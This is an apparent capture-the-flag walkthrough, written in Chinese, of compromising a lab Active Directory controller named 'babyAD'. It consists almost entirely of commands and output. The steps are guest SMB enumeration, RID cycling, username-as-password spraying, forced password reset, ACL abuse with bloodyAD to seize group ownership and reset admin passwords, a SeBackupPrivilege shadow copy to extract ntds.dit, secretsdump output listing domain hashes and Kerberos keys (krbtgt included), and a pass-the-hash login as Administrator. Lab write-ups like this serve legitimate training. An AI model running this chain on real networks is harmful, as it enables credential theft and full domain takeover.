babyAD
1. User
1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nmap 192.168.1.5 --min-rate 10000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:22 EST Nmap scan report for 192.168.1.5 Host is up (0.00037s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman MAC Address: 00:0C:29:AC:31:59 (VMware) Nmap done: 1 IP address (1 host up) scanned in 5.55 seconds ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nmap 192.168.1.5 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV -O Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:24 EST Nmap scan report for 192.168.1.5 Host is up (0.00051s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-03 11:24:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi rst-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi rst-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 MAC Address: 00:0C:29:AC:31:59 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%) OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_201 6 Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windo ws Server 2016 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: Host: BABYAD; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_nbstat: NetBIOS name: BABYAD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ac:31:59 (VMware) | smb2-time: | date: 2026-01-03T11:24:33 |_ start_date: N/A OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 50.76 seconds
1.2. SMB
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u 'guest' -p '' --shares SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest: SMB 192.168.1.5 445 BABYAD [*] Enumerated shares SMB 192.168.1.5 445 BABYAD Share Permissions Remark SMB 192.168.1.5 445 BABYAD ----- ----------- ------ SMB 192.168.1.5 445 BABYAD ADMIN$ 远程管理 SMB 192.168.1.5 445 BABYAD C$ 默认共享 SMB 192.168.1.5 445 BABYAD IPC$ READ 远程 IPC SMB 192.168.1.5 445 BABYAD NETLOGON Logon server share SMB 192.168.1.5 445 BABYAD SYSVOL Logon server share SMB 192.168.1.5 445 BABYAD Technical Security Notice READ
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u '' -p '' --generate-hosts-file hosts SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:B ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\: ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u '' -p '' --generate-krb5-file /etc/krb5.conf cat SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (na me:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] krb5 conf saved to: /etc/krb5.conf SMB 192.168.1.5 445 BABYAD [+] Run the following command to use the conf f ile: export KRB5_CONFIG=/etc/krb5.conf SMB 192.168.1.5 445 BABYAD [+] babyAD.com\: h ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# cat hosts 192.168.1.5 BABYAD.babyAD.com babyAD.com BABYAD ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# impacket-smbclient 'guest:@192.168.1.5' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Password: Type help for list of commands # shares ADMIN$ C$ IPC$ NETLOGON SYSVOL Technical Security Notice # use 'Technical Security Notice' # use Technical Security Notice # ls drw-rw-rw- 0 Fri Dec 26 23:10:12 2025 . drw-rw-rw- 0 Fri Dec 26 23:27:54 2025 .. -rw-rw-rw- 5045 Fri Dec 26 23:10:12 2025 技术安全通告.pdf # get 技术安全通告.pdf # exit
1.3. RID_Cycling
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u 'guest' -p '' --rid-brute SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:B ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest: SMB 192.168.1.5 445 BABYAD 498: BABYAD0\Enterprise Read-only Domain Contro llers (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 500: BABYAD0\Administrator (SidTypeUser) SMB 192.168.1.5 445 BABYAD 501: BABYAD0\Guest (SidTypeUser) SMB 192.168.1.5 445 BABYAD 502: BABYAD0\krbtgt (SidTypeUser) SMB 192.168.1.5 445 BABYAD 512: BABYAD0\Domain Admins (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 513: BABYAD0\Domain Users (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 514: BABYAD0\Domain Guests (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 515: BABYAD0\Domain Computers (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 516: BABYAD0\Domain Controllers (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 517: BABYAD0\Cert Publishers (SidTypeAlias) SMB 192.168.1.5 445 BABYAD 518: BABYAD0\Schema Admins (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 519: BABYAD0\Enterprise Admins (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 520: BABYAD0\Group Policy Creator Owners (SidTy peGroup) SMB 192.168.1.5 445 BABYAD 521: BABYAD0\Read-only Domain Controllers (SidT ypeGroup) SMB 192.168.1.5 445 BABYAD 522: BABYAD0\Cloneable Domain Controllers (SidT ypeGroup) SMB 192.168.1.5 445 BABYAD 525: BABYAD0\Protected Users (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 526: BABYAD0\Key Admins (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 527: BABYAD0\Enterprise Key Admins (SidTypeGrou p) SMB 192.168.1.5 445 BABYAD 553: BABYAD0\RAS and IAS Servers (SidTypeAlias) SMB 192.168.1.5 445 BABYAD 571: BABYAD0\Allowed RODC Password Replication Group (SidTypeAlias) SMB 192.168.1.5 445 BABYAD 572: BABYAD0\Denied RODC Password Replication G roup (SidTypeAlias) SMB 192.168.1.5 445 BABYAD 1000: BABYAD0\BABYAD$ (SidTypeUser) SMB 192.168.1.5 445 BABYAD 1101: BABYAD0\DnsAdmins (SidTypeAlias) SMB 192.168.1.5 445 BABYAD 1102: BABYAD0\DnsUpdateProxy (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 1103: BABYAD0\acc_admins (SidTypeGroup) SMB 192.168.1.5 445 BABYAD 1104: BABYAD0\wackymaker (SidTypeUser) SMB 192.168.1.5 445 BABYAD 1105: BABYAD0\babyad-admin (SidTypeUser) SMB 192.168.1.5 445 BABYAD 1106: BABYAD0\backup-opt (SidTypeUser) SMB 192.168.1.5 445 BABYAD 1107: BABYAD0\server-opt (SidTypeUser) SMB 192.168.1.5 445 BABYAD 1108: BABYAD0\accn-opt (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u valid_user.txt -p valid_user.txt --no-bruteforce SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Administrator:Administrator STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Guest:Guest STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\krbtgt:krbtgt STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\BABYAD$:BABYAD$ STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\babyad-admin:babyad-admin STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\backup-opt:backup-opt STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\server-opt:server-opt STATUS_LOGON_FAILURE SMB 192.168.1.5 445 BABYAD [-] babyAD.com\accn-opt:accn-opt STATUS_LOGON_FAILURE
改下密码
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u wackymaker -p wackymaker -M change-password -o NEWPASS=Admin123 SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE CHANGE-P... 192.168.1.5 445 BABYAD [+] Successfully changed password for wackymaker
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u wackymaker -p Admin123 SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\wackymaker:Admin123 ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc winrm 192.168.1.5 -u wackymaker -p Admin123 WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com) WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\wackymaker:Admin123 (Pwn3d!)
1.4. winrm
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# evil-winrm -i 192.168.1.5 -u wackymaker -p Admin123 Evil-WinRM shell v3.9 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\wackymaker\Documents> whoami;hostname babyad0\wackymaker babyAD *Evil-WinRM* PS C:\Users\wackymaker\Documents>
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir *Evil-WinRM* PS C:\Users\wackymaker\desktop> gci -path c:\users user.txt 目录: C:\users Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/27/2025 11:55 AM 18 user.txt *Evil-WinRM* PS C:\Users\wackymaker\desktop> gc c:\users\user.txt a3f5c9e47d2b1a8f
2. System
2.1. bloodhound
*Evil-WinRM* PS C:\Users\wackymaker\desktop> upload SharpHound.exe Info: Uploading /root/Desktop/machines/babyAD/SharpHound.exe to C:\Users\wackymaker\desktop\SharpHound.exe Data: 1748308 bytes of 1748308 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\wackymaker\desktop> .\SharpHound.exe -c ALL 2026-01-03T20:09:25.0406600+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound 2026-01-03T20:09:25.1812350+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry 2026-01-03T20:09:25.2125237+08:00|INFORMATION|Initializing SharpHound at 20:09 on 2026/1/3 2026-01-03T20:09:25.2437172+08:00|INFORMATION|Resolved current domain to babyAD.com 2026-01-03T20:09:25.3542563+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry 2026-01-03T20:09:25.4166617+08:00|INFORMATION|Beginning LDAP search for babyAD.com ... 2026-01-03T20:09:31.8660681+08:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2026-01-03T20:09:31.9288670+08:00|INFORMATION|Status: 299 objects finished (+299 49.83333)/s -- Using 72 MB RAM 2026-01-03T20:09:31.9288670+08:00|INFORMATION|Enumeration finished in 00:00:06.5298466 2026-01-03T20:09:32.0071000+08:00|INFORMATION|Saving cache with stats: 20 ID to type mappings. 0 name to SID mappings. 1 machine sid mappings. 3 sid to domain mappings. 0 global catalog mappings. 2026-01-03T20:09:32.0227859+08:00|INFORMATION|SharpHound Enumeration Completed at 20:09 on 2026/1/3! Happy Graphing! *Evil-WinRM* PS C:\Users\wackymaker\desktop> dir 目录: C:\Users\wackymaker\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/3/2026 8:09 PM 28121 20260103200926_BloodHound.zip -a---- 1/3/2026 8:09 PM 1566 N2Q4YzlmOWUtOGQxOC00ZmNiLTkzZjktNmJkOGZlYmQ5MzM4.bin -a---- 1/3/2026 8:09 PM 1311232 SharpHound.exe *Evil-WinRM* PS C:\Users\wackymaker\desktop> download 20260103200926_BloodHound.zip Info: Downloading C:\Users\wackymaker\desktop\20260103200926_BloodHound.zip to 20260103200926_BloodHound.zip Info: Download successful!
先把自己加到ACC_ADMINS组里面
┌──(root㉿kali)-[~/Desktop/BloodHound] └─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 set owner 'ACC_ADMINS' 'wackymaker' [+] Old owner S-1-5-21-3649830887-1815587496-1699028491-512 is now replaced by wackymaker on ACC_ADMINS ┌──(root㉿kali)-[~/Desktop/BloodHound] └─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add genericAll 'ACC_ADMINS' 'wackymaker' [+] wackymaker has now GenericAll on ACC_ADMINS ┌──(root㉿kali)-[~/Desktop/BloodHound] └─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add groupMember 'ACC_ADMINS' 'wackymaker' [+] wackymaker added to ACC_ADMINS
然后改BABYAD-ADM的密码
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors] └─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'wackymaker' -p 'Admin123' set password BABYAD-ADMIN Admin123 [+] Password changed successfully! ┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors] └─# nxc smb 192.168.1.5 -u BABYAD-ADMIN -p Admin123 SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123 ┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors] └─# nxc winrm 192.168.1.5 -u BABYAD-ADMIN -p Admin123 WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com) WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'BABYAD-ADMIN' -p 'Admin123' set password BACKUP-OPT Admin123 [+] Password changed successfully! ┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# nxc smb 192.168.1.5 -u BACKUP-OPT -p Admin123 SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BACKUP-OPT:Admin123
*Evil-WinRM* PS C:\Users\backup-opt\Documents> whoami /priv 特权信息 ---------------------- 特权名 描述 状态 ============================= ================ ====== SeMachineAccountPrivilege 将工作站添加到域 已启用 SeBackupPrivilege 备份文件和目录 已启用 SeRestorePrivilege 还原文件和目录 已启用 SeShutdownPrivilege 关闭系统 已启用 SeChangeNotifyPrivilege 绕过遍历检查 已启用 SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用 *Evil-WinRM* PS C:\Users\backup-opt\Documents>
2.2. 卷影备份
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh Microsoft DiskShadow 版本 1.0 版权所有 (C) 2013 Microsoft Corporation 在计算机上: BABYAD,2026/1/3 23:26:01 -> set context persistent nowriters -> add volume c: alias raj -> create 已将卷影 ID {c517776e-4909-438e-939e-9075f39a773a} 的别名 raj 设置为环境变量。 已将卷影集 ID {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的别名 VSS_SHADOW_SET 设置为环境变量。 正在查询卷影副本集 ID 为 {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的所有卷影副本 * 卷影副本 ID = {c517776e-4909-438e-939e-9075f39a773a} %raj% - 卷影副本集: {eeb0e07c-db9d-4383-8ea8-e717ceec7542} %VSS_SHADOW_SET% - 卷影副本原始数 = 1 - 原始卷名称: \\?\Volume{ed91bad1-0000-0000-0000-500600000000}\ [C:\] - 创建时间: 2026/1/3 23:26:01 - 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - 原始计算机: babyAD.babyAD.com - 服务计算机: babyAD.babyAD.com - 未暴露 - 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - 属性: No_Auto_Release Persistent No_Writers Differential 已列出的卷影副本数: 1 -> expose %raj% z: -> %raj% = {c517776e-4909-438e-939e-9075f39a773a} 已成功将卷影副本暴露为 z:\。 -> *Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Windows 的可靠文件复制 ------------------------------------------------------------------------------- 开始时间: 2026年1月3日 23:26:10 源: z:\windows\ntds\ 目标: C:\temp\ 文件: ntds.dit 选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ 1 z:\windows\ntds\ 新文件 16.0 m ntds.dit 0.0% 0.3% 0.7% 1.1% 1.5% 1.9% 2.3% 2.7% ... ------------------------------------------------------------------------------ 总数 复制 跳过 不匹配 失败 其他 目录: 1 0 1 0 0 0 文件: 1 1 0 0 0 0 字节: 16.00 m 16.00 m 0 0 0 0 时间: 0:00:00 0:00:00 0:00:00 0:00:00 速度: 270,600,258 字节/秒。 速度: 15,483.871 MB/分钟。 已结束: 2026年1月3日 23:26:10 *Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system 操作成功完成。 *Evil-WinRM* PS C:\temp> cd C:\Temp *Evil-WinRM* PS C:\Temp> download ntds.dit Info: Downloading C:\Temp\ntds.dit to ntds.dit Info: Download successful! *Evil-WinRM* PS C:\Temp> download system Info: Downloading C:\Temp\system to system Info: Download successful! *Evil-WinRM* PS C:\Temp>
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# impacket-secretsdump -ntds ntds.dit -system system local Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: ca0a78b7f0d8e8d570163049c1742318 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:1eb9a569e97548b6a4629f64979a193c::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6fab09b974ecbb7ba5447a076f494689::: wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:838e18ea954162b03ddea84fa0284139::: babyad.com\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:656d231c131a8f1ea8fd1138b8185674::: backup-opt:1106:aad3b435b51404eeaad3b435b51404ee:5ad41e36af059c77865edbc22925c33c::: server-opt:1107:aad3b435b51404eeaad3b435b51404ee:d99f9d8da6dad6dcae6b0d96104a445b::: accn-opt:1108:aad3b435b51404eeaad3b435b51404ee:b9a7a7fcc60bdb049811e7c7388112a3::: [*] Kerberos keys from ntds.dit Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574 Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128 Administrator:des-cbc-md5:34701ccb6efb9704 BABYAD$:aes256-cts-hmac-sha1-96:37cbade9fb078f11a30748756fd92ff7c64af78ca036f546c7ee10326ee3cf20 BABYAD$:aes128-cts-hmac-sha1-96:d896106e4587e25cb645b44c5f2aef0c BABYAD$:des-cbc-md5:d3b02ac8106ba89e krbtgt:aes256-cts-hmac-sha1-96:d24121bf2b99d3645b4d7360107674ba6e9f3c55ba79d3d508906e29f1e8a81e krbtgt:aes128-cts-hmac-sha1-96:5ed92e70800a8bc3da8e8a9220807d5e krbtgt:des-cbc-md5:2546020262f197a7 wackymaker:aes256-cts-hmac-sha1-96:9f8fc1b72c86c3881697938460386a078d0e062c07773f60961b5ef037571977 wackymaker:aes128-cts-hmac-sha1-96:2ef671fea3cbc6a11689c264636cf316 wackymaker:des-cbc-md5:0b7a079edae54c9e babyad.com\babyad-admin:aes256-cts-hmac-sha1-96:29f8a0be305a6a998fd0cb2798e3701f971370c9131d3e2369a13e2750130bc5 babyad.com\babyad-admin:aes128-cts-hmac-sha1-96:63a252cbc4cdc9ceeadea523d04b6673 babyad.com\babyad-admin:des-cbc-md5:f4983204910dbc62 backup-opt:aes256-cts-hmac-sha1-96:e6bd82c49938190ac40fc85355f3c1bb4e8d9739b2e33f9f7d9966b9664cbc12 backup-opt:aes128-cts-hmac-sha1-96:37dc64a75ed9200fcbf844e2d0f4c3ed backup-opt:des-cbc-md5:98e68c7c892a1fe5 server-opt:aes256-cts-hmac-sha1-96:58ce476e9085de94eefb9fde291703bc6bfc98085f9130fca1af4f17cc9f2f54 server-opt:aes128-cts-hmac-sha1-96:83694fead3994f8afe47736c447dd676 server-opt:des-cbc-md5:2f91d026abdaae08 accn-opt:aes256-cts-hmac-sha1-96:3c0003e231985e6cefb136450c1e3c2c597377f15156402e76c503f7604f5949 accn-opt:aes128-cts-hmac-sha1-96:bfe789b2a8141a2081540ac6262424a9 accn-opt:des-cbc-md5:457acdf425c80d68 [*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/machines/babyAD] └─# evil-winrm -i 192.168.1.5 -u administrator -H bbabdc192282668fe5190ab0c5150b34 Evil-WinRM shell v3.9 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoamibabyad0\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt6e9d14c2b7f08a53 *Evil-WinRM* PS C:\Users\Administrator\Documents>